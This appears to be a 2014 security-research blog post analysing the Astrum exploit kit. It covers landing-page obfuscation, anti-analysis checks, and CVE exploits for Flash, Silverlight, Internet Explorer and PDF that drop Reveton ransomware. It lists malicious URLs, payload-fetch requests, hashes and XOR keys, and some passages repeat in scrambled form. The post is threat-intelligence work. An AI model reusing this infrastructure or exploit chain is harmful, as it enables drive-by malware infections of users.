2014-09-14 - Study Say Hello to Astrum EK

Artist’s impression shows the structure of the Milky Way

NASA/JPL-Caltech/ESO/R. Hurt

adfraud

Kovter is not a ransomware anymore (since at least march 2014)

Say Hello to Astrum EK

Astrum EK 2014-09-06 - Real Name (not chosen)

(Fast looking at the URI pattern we may find it a little Angler-ish...but it's not)

Astrum will accept to serve a landing only once per IP and is also denying connection from Tor and (at least) Russia.



A The lifetime of the landing seems a little higher than on Angler or Nuclear Pack but where most of the time you need to fake some referer to avoid being rejected, with Astrum : show a referer and you'll get ignored and IP banned. Firefox, Chrome and Opera are also ignored (and i guess that they are filtered out upstream anyway). fast search lets think it's in use since at least 2014-08-15





Now let's take a look at the bullets and the ballistic.





CVE-2014-0515 - CVE-2013-0634 (Flash) :





Those days it's the most successful vuln targeted in exploit kits, followed by CVE-2013-2551.





CVE-2014-0515 successful path in Astrum EK

2014-09-06





GET http://static.yarkiy-mir .org/duf5ibqshp.html

200 OK (text/html)

Piece of Astrum's Landing 2014-09-06

http://pastebin.com/Jc5k0kvi

JsBeautified : http://pastebin.com/gvjskkG2

An array of modifed-Base64 strings, that are each XORed with a different byte and then inserted (in random order) into the JS later - The Base64 is using "A-Za-z0-9-:" instead of "A-Za-z0-9+/"



After deobfuscating the "div" value via the function t (using malzilla for instance) we get this : Obfuscation in used as described by EKWatcher After deobfuscating the "div" value via the function t (using malzilla for instance) we get this : http://pastebin.com/PfAjuvPR

There are sweet piece of code like those showing they had researcher/bots etc in mind while writing it : On landing load, script will try to catch debugging tools

(even phantom....)





and also check via loadXML if there are obvious researcher tools launched or if it's running in a VM. check for Kaspersky BHO

And here is the data that will be posted :

Fast sum-up of the data that will be encoded and posted in next call.

Comment are obviously not in the original code



POST http://static.yarkiy-mir .org/IVmTAccT_rdKYvlrrCSb3UJl-G-gc5uJSzOmaP8jldlPMKNo_iuSh1J_qjr5Ot7fTg.. 200 OK (text/html) CVE-2013-2551 and creation of the flash object.

Posted data (as Neutrino was doing) : http://pastebin.com/raw.php?i=GBHqpM4N

Which before encoding should look like :

Data sent to the Exploit kit on second call

Astrum - 2014-09-06

Piece of the Post Call reply. The obfuscation in use is the same as in the landing. Once decoded here is the Flash insertion : Astrum - Inserting the flash element.

http://pastebin.com/GYehkmaC

GET http://static.yarkiy-mir .org/kZThMKU15rv6r4tazgKD0fKoil7CVYOF-_7UWZ0FjdX__dFZnA2Ki-Ky2AWYHMbT_g.. 200 OK (application/x-shockwave-flash) 3fb2c3750d51268781fa608a42c3e4d7 CVE-2014-0515 & CVE-2013-0634 (Thanks to Arseny Levin (Spiderlabs) for the help)

GET http://static.yarkiy-mir .org/CjJXSImjvethCT0i4pTYgWkOPCbuw9jVYFhiIbGT1oVkW2chsJvR23kUbn27ip2DZQ.. 200 OK (application/octet-stream) Once Decoded: 9d9eb3ceffd6596ebdf7fc9387cd5cb1 - Reveton



Xored Payload. Key : 98EB68248A2815474CFE8902C0603770 I didn't check that deeply yet, but it seems you will get a unique Xor key for each pass.





I didn't check that deeply yet, but it seems you will get a unique Xor key for each pass.

CVE-2013-0074/3896 (Silverlight) :





Astrum EK - 2014-09-06

Silverlight Successful path









GET http://asset.yur88 .com/xawufyinv3lqr.html 200 OK (text/html)

To give an idea of the data being sent to the Exploit Kit

on the following post request. (md5 is different)

POST http://asset.yur88 .com/xcC2oZh5Lpbyq4bPox1Hq_uv3M-oGkXzoa_Vy_IaEvr4_IyZokFE_Lbmj5qmUA7-qg..



Astrum - 2014-09-06

Piece of the Post Call reply launching Silverligt and CVE-2013-2551 attack The silverlight call, once decoded :



Astrum : Post reply silverlight call once decoded

2014-09-06

http://pastebin.com/enPjFN96

200 OK (text/html)The silverlight call, once decoded :

GET http://asset.yur88 .com/06RCA_viDC7kz3JtwIZlE-3LKG3LgWdLt8shaZGBMELumHg7wdpmRKCCeD_AyyxGvA.. 200 OK (application/x-silverlight-app) 3b82c622a343317d14161206aa9f2fce

Silverlight Exploit e332a8d62288b80f939fff7d50ac33d3 sl.dll :

GET http://asset.yur88 .com/sKJTobP38yWHyWPPiJOaGI7NOc-DlJhA1M0wy9mUz0mNnmmZic-ZT8OEaZ2L3tNN3w.. 9d9eb3ceffd6596ebdf7fc9387cd5cb1

Xor key : BFAD0475157E8E15F72903B5E80649B2 200 OK (application/octet-stream)Reveton againXor key : BFAD0475157E8E15F72903B5E80649B2

CVE-2013-2551 :





CVE-2013-2551 successfully fired by Astrum EK

2014-09-11



GET http://img.gestionartepyme .com.ar/omhq1t4pjx3fac.html

200 OK (text/html)



POST http://img.gestionartepyme .com.ar/C1BzyerkwKg1aE_30oT_kDU9S6TYgfyXZj0SqIGFqsUzbEzzgNv8w3h2SvLUzeDAZA..

200 OK (text/html) POST http://img.gestionartepyme .com.ar/C1BzyerkwKg1aE_30oT_kDU9S6TYgfyXZj0SqIGFqsUzbEzzgNv8w3h2SvLUzeDAZA..200 OK (text/html)





http://pastebin.com/g847kaSX Piece of CVE-2013-2551 after first decoding pass.

After a first pass of decoding :



GET http://img.gestionartepyme .com.ar/Wi-S--HJ20lkF67F2ankcWRCqpbTrOd2N0LzmoqosSRiE63Bi_bnIikJq87f4PshNQ..

200 OK (application/octet-stream) a668806b4be0e3b02e3adf0130b70bd0 once decoded (reveton)

Xor Key: 3FF52A9A6B4C3E3DE93AD7183C0DFFA6



Payload written in %temp%\tmp1.log



If lock screen is activated you'll get for instance in the us : GET http://img.gestionartepyme .com.ar/Wi-S--HJ20lkF67F2ankcWRCqpbTrOd2N0LzmoqosSRiE63Bi_bnIikJq87f4PshNQ..200 OK (application/octet-stream)If lock screen is activated you'll get for instance in the us : Reveton - Screen locked - 2014-09-11 US.

CVE-2014-0322 :

For some reason I couldn't get that one working properly.

CVE-2014-0322 fired by Astrum

But unsuccessful. I'll update if i get a successful pass.



GET http://img.gestionartepyme .com.ar/zy6qjw78b3f4vus.html

200 OK (text/html)



Posted data after the landing, whispering the server to try

CVE-2014-0322 - (md5 is different)



POST http://img.gestionartepyme .com.ar/Nly0S9lDj4daNYQm6nfh71U1jCjjc-buCzLSc-Uht-8IbI935Hm07UV6jXDnaq_vWQ..

200 OK (text/html)



Obfuscated piece of code to trigger CVE-2014-0322

Astrum 2014-09-11 I won't put the decoded one ;)



Piece of the B64 encoded shellcode



CVE-2010-0188 :





Astrum firing CVE-2010-0188 (and Flash exploit also)

2014-09-11



GET http://assets.dance .com.ar/oljm3dz7pnh.html

200 OK (text/html)





Decoded posted data



I'll update if i get a successful pass.POST http://img.gestionartepyme .com.ar/Nly0S9lDj4daNYQm6nfh71U1jCjjc-buCzLSc-Uht-8IbI935Hm07UV6jXDnaq_vWQ..200 OK (text/html)I won't put the decoded one ;) POST http://assets.dance .com.ar/ZQc75hcLl-kOZATbKD-u1VpjA4kiO6-GDjgG2itsr4ZcOgeMKzOohBYhAt0pIreBCg..

200 OK (text/html)

Encoded part of the Post reply in charge of the call for CVE-2010-0188

Astrum - 2014-09-11 Once decoded :

Iframe called for CVE-2010-0188



GET http://assets.dance .com.ar/FCNKh1wkpvl_QHW6YxCfxStHcuhpFJ6Wfxx3u2BDnpYtHnbtYByZlGcFcLtiDYaRew..

200 OK (text/html)



Obfuscated : creation of the PDF object Decoded:



Deobfuscated call for PDF



GET http://assets.dance .com.ar/4RkrZSI07MGKehRYHQDV_d59EwoXBNSuiiYWWR5T1K7YJBcPHgzTrJI_ElAfHcypjg..200 OK (application/x-shockwave-flash) (CVE-2013-0634/2014-0515)



GET http://assets.dance .com.ar/DQT9jPZKYcJmZ8KxyX5Y_jJgxePDelmtZjvAsMotWa00OcHmynJer34ix7DJY0GqYg..

200 OK (application/pdf) CVE-2010-0188 a3aa7a4499e7b89768ee82ea5c3c8b4a



We have the same kind of obfuscation here that in the landing and post response.



Object in the PDF containing the Encoded data

Piece of js in charge of deobuscating and triggering the exploit



GET http://assets.dance .com.ar/jnK3hV3Yt6HlEYi4YuyOnbEWj-po6I_O5U2KuWG_j863T4vvYeCIzP1UjrBv8ZfJ4Q..

200 OK (application/octet-stream)



GET http://assets.dance .com.ar/DqVkvx0HOxZlxluCIjMCKjHBXNAoNwN5ZZpZgyFgA3k3mFjVIT8Ee32DXoMhLht-YQ..

200 OK (application/octet-stream) Decoded : 154a5d50ee032dc32e4c64ecbde0eaa1 Reveton



Note that both payload (flash and PDF) in that pass have same Xor key ( 919DCE47A3DBD2518B2F1088604AE0DA )





No Java ? Decoded:CVE-2010-0188We have the same kind of obfuscation here that in the landing and post response.GET http://assets.dance .com.ar/jnK3hV3Yt6HlEYi4YuyOnbEWj-po6I_O5U2KuWG_j863T4vvYeCIzP1UjrBv8ZfJ4Q..200 OK (application/octet-stream)GET http://assets.dance .com.ar/DqVkvx0HOxZlxluCIjMCKjHBXNAoNwN5ZZpZgyFgA3k3mFjVIT8Ee32DXoMhLht-YQ..200 OK (application/octet-stream) Decoded :Note that both payload (flash and PDF) in that pass have same Xor key ( 919DCE47A3DBD2518B2F1088604AE0DA )



This exploit kit had some java few weeks ago (CVE-2012-0507, CVE-2013-2460, CVE-2013-2465 - if you make a search on this IP in your log you might figure it ) but it seems java is not exploited anymore.

As





The exploitation Graph should be something like :



Astrum EK - Exploitation graph assumption 2014-09-14



Files :

AstrumEK_2014-09-14.zip (Owncloud) This exploit kit had some java few weeks ago (CVE-2012-0507, CVE-2013-2460, CVE-2013-2465 - if you make a search on this IP in your log you might figure it ) but it seems java is not exploited anymore.As I assumed for Flash EK , it's a trade of a now small percentage of infection for more stealth ( >> infection chain last longer >> less rebuild).The exploitation Graph should be something like :

PS: If you have some telemetry on this IP : 107.150.24.107 I would be really interested in the numbers. Seeing the infection path, I think traffic should be quite big.